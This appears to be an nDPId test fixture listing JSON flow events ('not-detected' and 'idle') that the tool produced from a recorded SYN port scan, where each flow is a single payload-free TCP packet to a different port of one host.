+00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":301,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":801,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":301,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1037,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8994,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1037,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8994,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":319,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":801,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":319,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8994,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8994,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":333,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4899,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":333,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4899,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":692,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4900,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":692,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":369,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4899,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":369,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4899,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":755,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4900,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":755,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1635,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1635,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":808,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":808,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1706,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1706,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":808,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":808,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1273,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1273,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1063,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1063,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":592,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":592,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":663,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":663,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":567,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9009,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":567,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":653,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9009,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":653,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9010,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1783,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9011,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1783,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9010,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
